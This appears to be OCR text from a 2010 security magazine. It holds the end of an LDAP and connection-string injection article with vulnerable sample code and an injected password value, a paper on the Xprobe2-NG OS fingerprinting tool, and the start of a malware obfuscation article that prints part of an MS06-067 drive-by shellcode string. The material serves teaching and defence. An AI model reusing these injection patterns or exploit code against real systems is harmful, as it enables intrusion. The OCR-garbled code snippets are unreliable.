our application will be connecting to a SQL Server 
RDBMS and querying a relational model via SQL, but 
this relational structure will be obtaining its data from 
a Directory Service. In order to do so, a linked server 
against the AD server must be created. A linked server 
enables SQL Server to execute commands against 
OLE DB data sources on remote servers, without tak- 
ing into account the type of technology of the remote 
server (an OLE DB provider must be available). 

To create a linked server against Windows 2000 
Directory Service sp_addlinkedserver 
system stored procedure has to be used with 
ADSDSOObject as the 'provider_name' parameter 
and adsdatasource as the 'data_source' parameter. 

EXEC sp_addlinkedserver 'ADSI', 
'Active Directory Services 2.5', 
'ADSDSOObject' , 'adsdatasource' 

Once the linked server is configured, the directory 
can be queried. The Microsoft OLE DB Provider for 
Microsoft Directory Services supports two command 
dialects, LDAP and SQL, to query the Directory Ser- 
vice. The OPENQUERY function 13 can be used to send 
a command to the Directory Service and consume its 
results in a SELECT statement. It executes the speci- 



fied pass-through query on the given linked server 
which is an OLE DB data source. The OPENQUERY 
function can be referenced in the FROM clause of a 
query as if it was a table. For example: 

SELECT [Name], SN [Last Name], ST 
State 

FROM OPENQUERY ( ADSI, 
'SELECT Name, SN, ST 
FROM W LDAP: //ADserver/ 
DC=ribadeohacklab 0U=Sales, DC=sales, D 
C=ribadeohacklab, DC=com, DC=ar ' ' 
WHERE objectCategory = "Person'' AND 
objectClass = "contact''') 

A common practice is to create a view (a view is a 
virtual table that consists of columns from one or more 
tables which are the result of a stored select statement) 
based on the result of the select statement against the 
directory (via OPENQUERY), and then make our ap- 
plications query this view (via common SQL syntax) in 
order to validate data from the directory. 

This practice reduces our LDAP injection problem 
to a SQL injection one. At this point, one can apply 
all well known SQL injection and Blind SQL injection 
techniques. It is important to be aware of this kind of 
technology because deciding to use this option due 
to the ease of use, may introduce security risks. 

Another common practice utilized to connect to an 
Active Directory repository is to use the same OLE DB 
provider for Active Directory Service 14 , without the 
SQL Server integration but with ADO objects 15 . Here is 
some Python sample code on the next page box. 

In the code, the connection string and the final 
query are created with some user input. This could al- 
low for example, an alteration of the ADSI Flags used 
in the connection or some other type of connection 
string attack 16 . 

If the password value entered was "s3cr3t;x" then 
the final and effective connection string would be: 

Provider=ADsDSOObject;User ID 
=someUser ; Password=s3cr3t ; Enc 
rypt Password=False ; Extended 
Properties="xxx; Encrypt 
Password=True" ;Mode=Read; Bind 
Flags=0; ADSIFlag=513 

This means that the property that is located after 
the password parameter was changed by moving 
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import win32com. client 

def ADQuery (user ,passwd, filters) : 

#some constants for ADS I flags 

ADS_SECURE_AUTHENTICATION = Oxl 

ADS_SERVER_BIND = 0x200 

objConn = Win32 com .client. Dispatch ( "ADODB . Connection ") 
COMCmd = Win32 com . client .Di spa tch ( "ADODB . Command") 

obj Conn . Connections tring = "Provider=ADsDSOObject;User Id=" + \ 

user +" ; Password="+ passwd + \ 

Encrypt Password=True ; ADSI Flag=" + \ 
str (ADS__SECURE_AUTHENTICATION + ADS_SERVER_BIND) 

obj Conn . Open () 

COMCmd . ActiveConnection = obj Conn 
COMCmd. Properties ("Page Size") .Value = 500 
COMCmd. Properties ("Searchscope") .Value = 2 
COMCmd . Proper ti es ( " Timeou t ") . Val ue = 10 

COMCmd . CommandText = "SELECT displayName , sAMAccountName \ 
FROM \'LDAP://SERVER/DC=DOMAINNAME\' \ 
WHERE objectCategory=\' %s\' " % filters 

obj RecordSet = COMCmd. Execute () [0] 
return obj RecordSet 



it to the "Extended Properties" and a default value 
appeared. So, depending on the implemented code 
one could even change ADSI flags or add extended 
properties that were not set by default. 

Most importantly, the final query can be changed 
just because the "filters" parameter is not validated. 
Basically, this code converts a LDAP injection into a 
SQL injection. 

As previously mentioned, this provider allows to 
use SQL syntax and also the LDAP search syntax so, 
depending on the application code an attack using 
any of the LDAP techniques mentioned before could 
also be performed. 

Something interesting about this provider is that, 
since it has a particular syntax in which not only filters 
but also attributes and search scope are specified in 
the search string 15 , an attacker may extend the "infor- 
mation disclosure" technique. 

Prevention Techniques 

LDAP Injection is just another type of Injection Attacks. 
As we have already discussed in this article, these kinds 
of attacks occur when an application (web or desk- 



top application) sends to the LDAP interpreter user- 
supplied data inside the filter options of the statement. 
When an attacker supplies specially crafted data, the 
possibility to create, read, delete or modify arbitrary 
data gets unlocked. The most effective mitigation 
mechanism is to assume that all user inputs are poten- 
tially malicious. Assuming that, the following is clear: 
"user inputs must always be sanitized on server side 
(in order to avoid client side data manipulation) before 
passing the parameter to the LDAP interpreter". 

This sanitizing procedure can be done in two differ- 
ent ways. The easiest one consists in detecting a possi- 
ble injection attack by analyzing the parameter looking 
for certain known patterns attacks, aided by different 
programming techniques, like regular expressions. This 
technique has the main disadvantage of Type I statisti- 
cal errors, also known as false positive cases. By apply- 
ing this mechanism we might be excluding valid user 
inputs, mistaking them as invalid parameters. 

A more sophisticated approach may include trying 
to modify the received user input to adapt it into a 
harmless one. This way, sanitizing the input would 
reduce the false positive cases. 
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In order to improve the effectiveness of this mea- 
sure, it is advised to make a double check, both on 
client and server side. By checking the input format 
on the client side application usability is improved, 
due to the fact that the user is prevented from getting 
explicit core application errors with a user friendly 
message. This first level of filtering should consider 
most common mistakes. However, a server side 
user input filtering or modification is mandatory. At 
this level, one has to make sure that the parameter 
received has the structure that is supposed to have. 
For example, if a user name is expected, it should only 
contain alphanumeric characters and perhaps other 
kind of special characters like underscore, but it would 
be really strange to find a bracket, an ampersand 
or an equal symbol. This can be checked by using a 
regular expression like"^ [A-Za-z0-9_-] +$". If we 
are using PHP, a similar code can be used: 

<?php 

$user=$_GET [ A username ' ] ; 

$UsrRegex = V ( A [A-Za-z0-9_-] +$) /"; 

if preg_match ( $UsrRegex, $user ) { 

$dn = "o=My Company, c=US"; 
$filter=" ( | (sn=$username*) 

(givenname=$username*) ) "; 
$sr=ldap_search ( $ds , $dn, $filter) ; 
} 

else { 

print "Invalid UserName"; 

} 

?> 

As it was discussed before -URL encoding & Unicode 
encoding -, any programmer must know that some 
type of character encoding could be used in param- 
eters and this has to be validated as well. For example, 
if the application is using APIs like MultiByteToW- 
ideChar or WideCharToMultiByte to translate Unicode 
characters, some code review may be needed since 
their incorrect usage could also lead to security is- 
sues 17 . 

Another concept that must be taken into account 
are the error formats. Errors should give the attacker 
as little information as possible. This is extremely 
important because if attackers can reach any kind of 
conclusion based on error messages, this is helping 
them to make the attack easier. For example, if the at- 



tacker sends an invalid input in a form, by getting an 
error message that is returned by the server after the 
execution, it is easy to realize that the LDAP queries 
are executed without prior validation, what makes the 
application eligible for a possible exploit target. 

As a general conclusion, we can say the best way 
to avoid this kind of injection attacks is to always 
mistrust from the parameters obtained from user 
input and always validate them before using to build 
a query. 

Tools 

As shown, there are different techniques and trying 
all of them by hand could be very time consuming. 
Fortunately, there are some tools that automate LDAP 
injection attacks and help you find vulnerabilities. This 
article does not intend to list all of the existing tools, 
so here are briefly mentioned some of them. 

W3AF 

This is a well known web attack and audit framework 
completely developed in Python. You can download it 
from http://w3af.sourceforge.net 

This framework has a plugin named LDAPi which 
can perform LDAP injections against a web applica- 
tion. By modifying the LDAPi. py plugin the user can 
add new strings to test on the injection attack. 

LDAP Injector 

This is a tool developed by lnformatica64 which can 
be downloaded from http://www.informatica64.com/ 
foca/download/ldaplnjector_0_2_1_0.zip 

The tool has a GUI that will let the user perform 
dictionary based attacks replacing values and analyz- 
ing responses and will also perform and attack by 
reducing the valid charset and then applying boolean 
analysis to find valid values. 

This blog post (in Spanish) shows an example on 
how to use the tool: http://elladodelmal.blogspot. 
com/2009/04/ldap-injector.html 

JBroFuzz 

This is a web app fuzzer you can download from 
OWASP at http://www.owasp.org/index.php/ 
Category:OWASP_JBroFuzz 

This tool was developed in Java and has multiplat- 
form support. It has a GUI with different fuzzing op- 
tions with some graphing features to report results. 

It has several fuzzers grouped by categories, and 
there's one for LDAP injections. 



16 JANUARY 2010 



Keeping Knowledge Free 



HUB Magazine 

www.hackinthebox.org 



Wapiti 

Wapiti is a command line web app vulnerability scan- 
ner also developed in Python. You can find it at 
http://wapiti.sourceforge.net 

It performs scans looking for scripts and forms 
where it can inject data. Once it gets this list, it acts 
like a fuzzer, injecting payloads to see if a script is 
vulnerable. There are some config files containing dif- 
ferent payloads that can be customized. 

wsScanner and Web2Fuzz 

wsScanner is a toolkit for Web Services scanning and 
vulnerability detection and Web2Fuzz is a web app 
fuzzing tool both developed by Blueinfy Solutions. You 
can obtain them from http://blueinfy.com/tools.html 

These tools have a GUI and share some functional- 
ity. They allow to define the fuzzing load to use while 
scanning. This allows the user to define custom LDAP 
injection payloads and see the result. 

Web2Fuzz tool also let the user choose different 
character encoding options to apply to the payloads. 

Wfuzz 

This tool is a web bruteforce scanner developed in 
Python by Edge-Security. You can download it from 
h ttp://www. edge-security, com/wfuzz.php 

It performs different kind of injections attacks in- 
cluding some basic LDAP injection. 

This application has some text files storing injection 
attacks and they can be customized by adding more 
injection patterns. 
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Active operating system fingerprinting is the 
process of actively determining a target net- 
work system's underlying operating system 
type and characteristics by probing the target system 
network stack with specifically crafted packets and 
analyzing received response. Identifying the underly- 
ing operating system of a network host is an impor- 
tant characteristic that can be used to complement 
network inventory processes, intrusion detection 
system discovery mechanisms, security network scan- 
ners, vulnerability analysis systems and other security 
tools that need to evaluate vulnerabilities on remote 
network systems. 

During recent years there was a number of publi- 
cations featuring techniques that aim to confuse or 
defeat remote network fingerprinting probes. 

In this paper we present a new version Xprobe2, 
the network mapping and active operating system 
fingerprinting tool with improved probing process, 
which deals with most of the defeating techniques, 
discussed in recent literature. 

Keywords: network scanning, system fingerprinting, 
network discovery 

1.0 INTRODUCTION 

One of the effective techniques of analyzing intru- 
sion alerts from Intrusion Detection Systems (IDS) is 
to reconstruct attacks based on attack prerequisites 8 . 
The success rate of exploiting many security vulner- 
abilities is heavily dependent on type and version of 
underlying software, running on attacked system and 
is one of the basic required components of the attack 
prerequisite. When such information is not directly 
available, the Intrusion Detection System correlation 



engine, in order to verify whether attack was success- 
ful, needs to make "educated guess" on possible type 
and version of software used at attacked systems. 

For example, if Intrusion Detection system captured 
network payload and matched it to the exploit of Win- 
dows system vulnerability, the risk of such detected 
attack would be high only if target system exists, 
indeed is running Windows Operating System and 
exposes the vulnerable service. 

In this paper we propose a new version of the 
Xprobe2 tool 1 (named Xprobe2-NG) that is designed 
to collect such information from remote network 
systems without having any privileged access to 
them. The original Xprobe2 tool was developed based 
on number of research works in the field of remote 
network discovery 13,12 and includes some advanced 
features such as use of normalized network packets 
for system fingerprinting, "fuzzy" signature match- 
ing engine, modular architecture with fingerprinting 
pluginsand soon. 

The Xprobe2-NG basic functionality principles are 
similar to the earlier version of the tool: the Xprobe2- 
NG utilizes similar remote system software finger- 
printing techniques. However the tool includes a 
number of improvements to the signature engine and 
fuzzy signature matching process. Additionally, the 
new version of the tool includes a number of signifi- 
cant enhancements, such as use of test information 
gain weighting, originally proposed in 4 . The network 
traffic overhead minimization algorithm uses the test 
weights to re-order network probes and optimize 
module execution sequence. The new version of the 
tool tool also includes modules to perform target 
system probing at the application layer. This makes 
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the tool capable of successfully identifying the target 
system even when protocol scrubbers (such as PF on 
OpenBSD system) are in front of the probed system 
and normalize network packets 2,5 . 

Use of Honeynet software (such as honeyd) is also 
known to confuse remote network fingerprinting. 
These Honeynet systems are typically configured 
to mimic actual network systems and respond to 
fingerprinting with packets that match certain OS 
stack signatures 9 . Xprobe2-NG includes the analytical 
module that attempts to detect and identify possible 
Honeynet systems among the scanned hosts. 

This paper's primary contribution is introduction 
of remote network fingerprinting tool that uses both 
network layer and application layer fingerprints to 
collect target system information and is capable of 
feeding such data (in form of XML) to information 
consumers (such as Intrusion Detection System cor- 
relation engine). 

The rest of this paper is organized as follows: Sec- 
tion 2 introduces basic concepts of network finger- 
printing and the problems that the tool has to deal 
these days, and also proposed solutions. Section 
3 introduces basic Xprobe2/Xprobe2-NG architec- 
ture. Section 4 introduces improvements that were 
brought in Xprobe2-NG. Section 5 demonstrates 
some evaluation results and section 6 discusses pos- 
sible problems and section 7 concludes this work. 

2.0 PRELIMINARIES 

Network Scanning is the process of sending one or 
a number of network packets to a host or a network, 
and based on received response (or lack of such) jus- 
tifying the existence of the network or the host within 
target IP address range. 

Remote Operating System Fingerprinting is the 
process of identifying characteristics of the software 
(such as Operating System type, version, patch-level, 
installed software, and possibly - more detailed infor- 
mation), which runs on remote computer system. This 
can be done by analyzing network traffic to and from 
the remote system, or by sending requests to remote 
system and analyzing the responses. 

The passive analysis of network traffic is frequently 
named in literature as passive fingerprinting and 
active probing of remote systems is named as active 
fingerprinting. 

Xprobe2-NG is a novel active remote operating 
system fingerprinting tool that uses TCP/IP model net- 
working layer protocols and application layer requests 



to identify the type and version of operating system 
software, running on target system. 

With introduction of application layer tests 
Xprobe2-NG aims at resolving the problems, which 
can not be resolved by fingerprinting at network layer. 
In the remaining part of this section we are going to 
discuss typical problems and issues that a network 
layer operating system fingerprinting tools have to 
deal with during the scanning process. 

2.1 Modern Fingerprinting Problems 

Honeypot systems, modified TCP/IP stack settings and 
network packet scrubbers are known to frequently 
confuse remote fingerprinting tools. Honeypot 
systems often respond as hosts or a group of hosts 
to remote fingerprinting tools. Modified TCP/IP stack 
responses are hard to fingerprint with strict signature 
matching. When packets traverse across the network, 
they can be modified by network traffic normaliz- 
ers. All of these factors affect the accuracy of the OS 
fingerprinting. 

Xprobe2-NG is aware of these problems and deals 
with them by using fuzzy matching and mixed signa- 
tures that probe target system at different layers of 
OSI Model network stack. 

Moreover, such behavior of some routing and pack- 
et filtering devices could be analyzed and signatures 
to identify and fingerprint intermediate nodes could 
be constructed. 

For example, OpenBSD PF filter is known to return 
different values in TTL field, when a system behind the 
filter is accessed 6 . A signature can be constructed to 
detect this behavior. 

3.0 TOOL ARCHITECTURE OVERVIEW 

The Xprobe2-NG tool architecture includes several 
key components: core engine, signature matcher, and 
an extendable set of pluggable modules (also known 
as plugins). The core engine is responsible for basic 
data management, signature management, modules 
selection, module loading and probe execution. The 
signature matcher is responsible for result analysis. 
The plugins provide the tool with packet probes to be 
sent to the target systems and methods of analyzing 
and matching the received responses to the signature 
entries. 

The Xprobe2-NG modules are organized in several 
groups: Network Discovery Modules, Service Mapping 
Modules, Operating System Fingerprinting Modules 
and Information Collection Modules. 
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Figure 1: Implementation Diagram 
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The general sequence of module execution is 
denoted on Figure 1. Each group of the modules is de- 
pendent on successful execution of the other group, 
therefore groups of modules are executed sequential- 
ly. However each particular module within the group 
may be executed in parallel with another module 
within the same group. 

It is possible to control which modules, and in what 
sequence are to be executed, using command line 
switches. 

3.1 Network Discovery Modules 

Xprobe2 discovery modules are designed to perform 
host probing, firewall detection, and provide informa- 
tion for the automatic receive-timeout calculation 
mechanism. Xprobe2-NG comes with a new module 
that uses SCTP protocol for remote system probing. 

The aim of all network discovery modules is to elicit 
a response from a targeted host, either a SYN — ACK or 
a RST as a response for the TCP ping discovery module 
and an ICMP Port Unreachable as a response for the 



UDP ping discovery module or an SCTP response for 
SCTP ping module. The round trip time, which can be 
calculated for any successful run of a discovery mod- 
ule, is remembered by module executor and is further 
used by the receive-timeout calculation mechanism. 
The receive-timeout calculation mechanism is used at 
the later stage of the scanning to to estimate actual 
target system response time and identify silently 
dropped packets without having to wait longer. 

3.2 OS Fingerprinting Modules 

The Operating System Fingerprinting Modules in 
Xprobe2-NG include both network layer fingerprint- 
ing modules that operate with network packets and 
application layer fingerprinting modules that operate 
with application requests. 

The OS fingerprinting modules provide set of tests 
for a target (with possible results, stored in signature 
files) to determine the target operating system and 
the target architecture details based on received 
responses. 
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The execution sequence and the number of ex- 
ecuted operating system fingerprinting modules can 
be controlled manually or be selected automatically 
based on the information discovered by network 
discovery modules or provided by command line 
switches. 

3.3 Fuzzy Signature Matching Mechanism 

The Xprobe2 tool stores OS stack fingerprints in form 
of signatures for each operating system. Each sig- 
nature will contain data regarding issued tests and 
possible responses that may identify the underlying 
software of target system. 

Xprobe2/Xprobe2-NG signatures are presented in 
human-readable format and are easily extendable. 
Moreover,the signatures for different hosts may have 
variable number of signature items (signatures for dif- 
ferent tests) presented within the signature entry. This 
allows the tool to maintain as much as possible infor- 
mation on different target platforms without need 
to re-test the whole signature set for the full set of 
fingerprinting modules every time, when the system 
is extended with new fingerprinting modules. 

Following example depicts the Xprobe2-NG signa- 
ture for Apple Mac OS operating system with applica- 
tion layer signature entry for SNMP protocol. 

fingerprint { 

OS_ID = "Apple Mac OS X 10.2.3" 
icmp_echo_reply = y 
icmp_echo_code = ! 0 

snmp_sysdescr = Darwin Kernel Ver- 
sion 

http_caseinsensitive = y 

} 

The signature contains the pairs of key, values 
for fingerprinting tests (key) and matching results 
(values). The keywords are defined by each module 
separately and registered within Xprobe2 signature 
parser run-time. 

Xprobe2 is the first breed of remote OS fingerprint- 
ing tools that introduced "fuzzy" matching algorithm 
for the Remote Operating System Fingerprinting pro- 
cess. The "fuzzy" matching is used to avoid impact on 
the accuracy of fingerprinting by failed tests and the 
tests, which were confused by modified TCP/IP stacks 
and network protocol scrubbers. Thus in case if no full 
signature match is found in target system responses, 



Xprobe2 provides a best effort match between the 
results received from fingerprinting probes against a 
targeted system to the signature database. The details 
of Xprobe2 "fuzzy" matching algorithm can be found 
in our earlier publication 1 . 

In Xprobe2-NG the "fuzzy" matching algorithm is 
updated, so module weights and reliability metrics 
are used in final score calculation. The original algo- 
rithm for module weight calculation is proposed in 4 . 
Reliability metric is a floating point value in range 1 , 
which can be optionally included as part of signature 
for each test. 

4.0 TOOL IMPROVEMENTS 

4.1 Application Layer Signatures 

Some TCP/IP network stacks may be modified delib- 
erately to confuse remote Operating System Finger- 
printing attempts. In other cases a network system 
may simply forward a TCP port of an application. The 
modern OS fingerprinting tool has to have possibili- 
ties to deal with this type of systems and possibly 
identify the fact of OS stack modification or port for- 
warding. Xprobe2-NG deals with the fact by using ad- 
ditional application layer differentiative tests to map 
different classes of operating systems. The methods 
of application layer fingerprinting are known to be 
effective 2 and it is much harder to emulate application 
layer responses to match signatures of a particular 
operating system. The application layer responses are 
not modified by network protocol scrubbers and thus 
may provide more accurate information. We do not 
claim that it is impossible to alter system responses at 
application layer, but we simply point out there is less 
motivation to modify system responses at application 
layer, as this is much more complex task with higher 
risks of bringing system instability or introducing 
security vulnerabilities in the application. 

The applications running on different operating 
systems may respond differently to certain type of re- 
quests. This behavior is dictated by operating system 
limitations or differences in design of underlying op- 
erating system components. A simple test that verifies 
'directory separator' mapping simply tests how target 
system handles '/'and 'W'type requests. The applica- 
tion will respond differently under Windows and Unix 
because of the difference in the filesystem imple- 
mentation. Modifying Application layer responses to 
respond as other type of operating system is not an 
easy task. For example, normalization of responses 
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to"..\..\ requests on web server running on the top of 
OS/2 platform may "unplug" a security hole on this 
operating system 7 . 

Xprobe2-NG uses application-layer modules in or- 
der to detect and correct possible mistakes of finger- 
printing at network layer. These modules can also col- 
lect additional information on target host. In addition 
to that, the new version of Xprobe2-NG comes with a 
module that attempts to detect honeyd instances and 
other "honeypot" systems by generating known-to-be 
valid and invalid application requests and validating 
responses. The variable parts of these requests, such 
as filenames, usernames and so on, are randomly 
generated to increase complexity of creating "fake" 
services without full implementation of the applica- 
tion or protocol. Inconsistencies with received appli- 
cation responses are considered as signs of possible 
honeypot system. 

In addition to that, the inconsistency of the results 
returned by application layer tests and network layer 
tests may signify presence of a honeypot system, a 
network-layer packet normalizer or a system running 
static port address translated (PAT) services. 

The detailed list of implemented application layer 
tests is shown in Table 4.1 . As it can be observed from 
this table, some of these application layer tests can 
only differentiate between classes of operating sys- 
tems, while others may identify certain characteristics, 
such as used filesystem type, which are specific to the 
particular operating system(s) and and may give some 
clues of used software version. 

We would like to further discuss the groups of ap- 
plication layer tests, which are supported by our tool. 
However it should be understood that the testing 
possibility at application layer is not limited by those 



Figure 2: Xprobe2-NG Application Layer Tests 
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methods discussed in this section. More specific 
application layer tests, such as used for HTTP Server 
fingerprinting 10 or Ajax Fingerprinting Techniques 11 
can be used to gain additional precision in remote 
system fingerprinting process. 

Underlying Filesystem tests - this group of tests 
aims at detecting how underlying OS system calls 
handle various characteristics of directory or file 
name. For example, FAT32 and NTFS filesystems threat 
MS-DOS file names, such as F00<1 .HTM, in a special 
way, file names are case insensitive, requests to file 
names containing special character 0x1 a (EOF marker) 
will return different HTTP responses from a web server 
running on the top of Windows (403) and Unix OS 
(404). Presence of special files - This method is not 
as reliable as filesystem based methods, however it 
often produces useful results. There are special files 
on some filesystems, such as Thumbs.db that is auto- 
matically created on Windows systems when folder 
is accessed by Explorer. The file format is different on 
different OS versions. If such file is obtained, it is pos- 
sible to validate whether the file was created at the 
system where it is presently located by comparing the 
application and the file time stamps. 

We also believe it might be possible to perform 
further differentiation of operating systems at applica- 
tion layer by analyzing encoding types, supported by 
application or underlying file system. It may also be 
possible to analyze distribution of application layer 
response delays for different requests in order to iden- 
tify "fake" services or fingerprint particular software 
versions. Further research in this area is needed. 

4.2 Optional TCP Port Scanning 

One of the motivations for developing the original 
Xprobe2 tool was to avoid dependency on network 
fingerprinting tests that would require excessive 
amount of network probes in order to collect the 
preliminary information. Xprobe2-NG network layer 
tests are primarily based on variety of ICMP protocol 
tests. Such tests do not require any additional infor- 
mation of target system, such as UDP or TCP open or 
closed port numbers simply because there is no "port" 
concept in context of the protocol. 

The optional TCP/UDP port scanning module, when 
enabled, allows execution of TCP, UDP and application 
layer tests, because only these tests require knowl- 
edge of TCP and UDP port status. 

If optional TCP/UDP port scanning module is not 
executed, which is default behavior, Xprobe2-NG will 
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Figure 3: Xprobe2-NG and nmap generated traffic loads 




□ throughput Min: £.Bk Max; ES.Ek. Aug; 13.7k Current: 4.2k 



only use information provided by command line (such 
as open port numbers), and the ports, which sta- 
tuses are discovered during execution of other tests. 
Modules are reordered prior the execution in order 
to minimize total number of packets and optimize 
useablity of information that could be discovered dur- 
ing each module execution. For example, the applica- 
tion layer test that uses UDP packet with SNMP query 
will be placed for execution before the module that 
requires a closed UDP port. When the SNMP query is 
sent, the received response (if any) will reveal the sta- 
tus of SNMP port at target system. If the UDP port is 
closed, the ICMP Port Unreachable response would be 
received. In this case the received datagram is passed 
to the module that requires closed UDP port. If a UDP 
packet response is received, the SNMP signatures can 
be matched to the received response. If no response 
is received, the result of this test is not counted. 

This way Xprobe2-NG maintains its minimal usage 
of packets for the network discovery. 

5.0 EVALUATIONS 

We evaluated the new version Xprobe2-NG system 
by executing Xprobe2-NG and nmap scans against 
a number of different network systems: computer 
hosts, running Linux and windows operating systems 
and variety of protocols, routers and networked print- 
ers. Additionally, we tested Xprobe2-NG against a 
web server system running on Linux operating system 
and protected by OpenBSD packet filter with packet 
normalization turned on. We verified correctness of 
each execution and corrected the signatures, when it 
was necessary. 
The HTTP application module was manually loaded 



in Xprobe2-NG by specifying port 80 as open port in 
Xprobe2-NG command line. The same parameter was 
passed to Nmap tool. Nmap used port module for TCP 
ping probe to identify responsiveness of remote system. 

We also performed a few test runs by simultaneous- 
ly executing Xprobe2-NG and nmap against unknown 
network systems and recording network traffic load 
generated by each tool. The the sampled network 
traffic throughput, recorded with ntop, is shown on 
Figure 3. Please note that nmap needs to execute port 
scanning in order to be able to successfully guess 
remote operating system type, while Xprobe2-NG 
can rely on results of the tests, which do not require 
any ports to be known, with exception for application 
layer module. The diagram simply demonstrate that 
it is possible to decrease network overhead when no 
TCP port scanning is performed. 

6.0 DISCUSSIONS 

Our tool provides a high performance, high accuracy 
network scanning and network discovery techniques 
that allow users to collect additional information of 
scanned environment. Xprobe2-NG is focused on 
using minimal amount of packets in order to perform 
active operating system fingerprinting, that makes 
the tool suitable for larger-scale network discovery 
scans. However these benefits also lead to some limi- 
tations, which we would like to discuss in this section. 

In order to successfully fingerprint target system, 
Xprobe2-NG needs the remote host to respond to at 
least some of the tests. If no preliminary information 
is collected before the tests and some of the protocols 
(such as ICMP) are blocked, Xprobe2-NG results may 
be extremely imprecise or the tool may actually fail to 
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collect any information at all. We consider this as the 
major limitation of the tool. 

The other limitation with the application-layer tests 
is that currently Xprobe2-NG does not perform net- 
work service fingerprinting. By doing so we minimize 
network traffic overhead and risk of remote service to 
crash, however Xprobe2-NG may also run wrong tests 
on the services, that are running on non-standard 
ports or even miss the services, which are running on 
non-common port numbers. Methods of low-over- 
head, risk-free network service fingerprinting could 
be subject of our further research that could resolve 
this limitation. 

Also, despite of the fact that the the tool is capable 
of performing remote host fingerprinting without 
performing any preliminary port scanning of the tar- 
get system, this may lead to significant performance 
drops when running application-layer tests on filtered 
port numbers. We believe that preliminary port probe 
for each application-layer test may be helpful to 
resolve this limitation. 

Xprobe2-NG uses libpcap library for its network 
traffic capture needs. The library provides unform 
interface to network capture facilities of different 
platforms and great portability, however it also makes 
the tool unsuitable for high-performance, large vol- 
ume parallel network fingerprinting tasks, due to high 
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7.0 CONCLUSION 
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8.0 AVAILABILITY 

Developed application is free software, released un- 
der GNU General Public License. The discussed version 
of this software will be released before the conference 
at the project web site: http://xprobe.sourceforge.net 
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Malware Obfuscation Tricks and Traps 

By Wayne Huang (wayne@armorize.com, Armorize Technologies) & Aditya K Sood (Sr. Security Researcher, COSEINC) 



With growing Internet accessibility a new 
trend of malicious software (malware) has 
been rapidly evolving. So called Web-based 
malware typically consists of multiple components 
and combines elements written mostly in script 
languages (exploit kits/packs), lightweight multi-plat- 
form binary executables written in low-level languag- 
es (loaders), and full-blown binaries with set of actual 
"malicious" functions. The first component (lets call it 
boot-strap code) is developed in scripting languages 
whose dynamic features make it easy to obfuscate 
and much harder to detect with static analysis. The 
malware obfuscation methods are extremely dynamic 
and fast-evolving, using some obscure, or undocu- 
mented language features, some of the obfuscation 
techniques actually took malware obfuscation "kung 
fu"to absoutely new level -- implementing not simple 
obfuscation but also malware steganographic tech- 
niques. This paper discusses why Web-based mal- 
ware are difficult to detect, and proposes alternative 
mechanisms for efficient detection. 

The Web-Based Malware Threat 

The authors have seen web-based malware, often 
known as "drive-by-download" attacks, since early 
2000, and in 2002 devised a client-honeypot-based 
detection mechanism and conducted a mass-scale 
study [Huang03]. However, it wasn't until Provos et 
al.'s publication in HOTBOTS'07 [Provos07], where 
Google claimed that 1 0% of its indexed pages contain 
malware, did the public become widely aware of the 
threat. In 2008, a followup research report by the 
same authors demonstrated that as of February 2008, 
Google has indexed over 3 million URLs that initiate 
drive-by downloads, and over 1 .3% of queries submit- 
ted to Google returned malicious URLs in the search 
result [Provos08].This research, however, wasn't late 
enough to take into account the ongoing, mass-scale, 
automated SQL injection attacks that insert web- 
based malware into vulnerable websites [Keizer08- 
Jan], which became known to the larger public in Jan 



2008. By April, such attacks were known to hit half a 
million pages per wave of attack [Keizer08-Apr]. By 
May, they were known to hit 1 .5 million pages per 
wave of attack [Dancho08-May]. 

When these automated tools are successful at 
exploitation, they insert malicious (and obfuscated) 
javascripts into content that is delivered to website 
visitors; when they are not, the script becomes a part 
of the content itself and are rendered; messing up 
the original content and making it widely obvious 
that the victim's site has been compromised. One can 
perform following sample searches on Google to see 
a list of compromised websites: 
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Figure one shows a search on Google revealing more 
than half a million sites mis-infected with malicious 
javascripts. We call this "mis-infection" because these are 
instances where the mass SQL injection was unsuccess- 
ful, therefore causing the malicious javascript to become 
a part of the content itself and be indexed by Google. 
Even if injection had only 50% success rate, that would 
already make a million compromised websites. 

Javascript Kung-Fu: Why Detection is Difficult 

Many solutions have been proposed to detect such 
inserted (web-based) malware; more precisely, to de- 
tect obfuscated scripts inside the infected web pages. 
Provos et al. [Provos07] [Provos08], for example, de- 
vised Google's mechanisms. Security companies large 
and small also pushed out their solutions. Unfortu- 
nately, detection rate has been low due to the nature 
of Web-based malware. Due to speed considerations, 
today's detection techniques are mostly signature- 
based pattern matching technologies. Consider a 
gateway device trying to identify malware inside 
inbound HTTP responses on a gigabyte network. Each 
HTTP response must be processed in nanoseconds, 
and behavior-based detection is simply impossible- 
pattern-based is the only feasible approach. 

Traditional host-based viruses or malware exist in 
the form of binary executables, which makes obfusca- 
tion (or packing) quite difficult, and therefore pattern- 
based detection yields acceptable results. Further, 
many antiviruses use heuristics algorithms to monitor 
virus execution process and detect malicious behavior. 
However, the boot-strap code of Web-based malware 
exist primarily in the form of scripts (e.g., javascript, 
vbscript, actionscript), which makes obfuscation 
extremely easy, and pattern-based detection almost 
impossible. Heuristics detection is also difficult due 
to nature of code execution (inside the browser). For 
Windows and Unix executables, dynamically generated 
executable code (polymorphics) is not very common 
due to architectural difficulties, however in javascript, it 
is the norm. Benign Windows and unix executables are 
rarely obfuscated, so detection mechanisms can simply 
detect the fact that the binaries are obfuscated, and fire 
an alarm. In Web scripting languages such as javascript 
and vbscript, obfuscation is the norm because it is 
seen as the only measure to protect the source code. 
Since script languages are interpreted, scripts are not 
compiled into binaries prior to execution and source 
code must be present for execution. Therefore the only 
way to protect intellectual property is to obfuscate 



the source code. Over the years, many open source 
obfuscators have been developed [Edwards] [Martin] 
[Vanish] [Shang] [SaltStorm], and many commercial 
obfuscators are also available [Jasob] [Ticket] [JSource]. 
A long survey of all open source /free /commercial 
script obfuscators can be found in [AjaxPath]. Today, a 
majority of commercial scripts are obfuscated by the 
providers. Another reason to pack javascripts is for 
size reduction and hence speed gain. For this purpose, 
Yahoo! offers and promotes its online javascript packer 
called the Yahoo! User Interface Compressor [YUI], and 
Mootools offers an online function for users to create 
their own "build", which excludes unused javascripts 
and packs used ones. 

This all renders "treating packing as indicator of 
malware" a useless detection technique against Web- 
based malware. However, detecting malicious be- 
havior itself is almost impossible due to the dynamic 
nature of scripting languages. 

Take the following example. Below is a piece of 
drive-by-download code that exploits MS06-067: 

<script> 

shellcode = unescape ( "% u 4343"+"%u434 
3"+"%u4343" + 

"%ua3e9%u0000%u5f00%ual64%u0030%u000 
0%u408b%u8b0c" + 

"%ulc7 0%u8bad%u08 68%uf7 8b%u04 6a%ue85 
9%u0043%u0000" + 

